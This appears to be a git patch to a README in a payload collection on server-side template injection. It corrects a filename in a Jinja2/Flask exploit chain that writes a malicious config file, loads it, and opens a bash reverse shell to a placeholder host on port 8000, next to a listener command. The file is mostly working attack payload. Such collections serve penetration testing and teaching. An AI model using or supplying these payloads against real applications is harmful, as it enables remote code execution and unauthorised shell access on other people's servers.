From bb98bd93395649c38e7a398c1ecbff5070fb6197 Mon Sep 17 00:00:00 2001
From: Soka
Date: Sat, 1 Apr 2017 18:53:43 +0300
Subject: [PATCH] Add Template injections + Jinja template injection
---
 Template injections/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Template injections/README.md b/Template injections/README.md
index f1535c4..59e9f3f 100644
--- a/Template injections/README.md
+++ b/Template injections/README.md
@@ -53,7 +53,7 @@ nv -lnvp 8000
 Inject this template
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
-{{ config.from_pyfile('/tmp/sokaexploit.cfg') }} # load the evil config
+{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config
 {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
 ```
@@ -61,4 +61,4 @@ Inject this template
 [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
 #### Training
-[https://w3challs.com/](https://w3challs.com/)
\ No newline at end of file
+[https://w3challs.com/](https://w3challs.com/)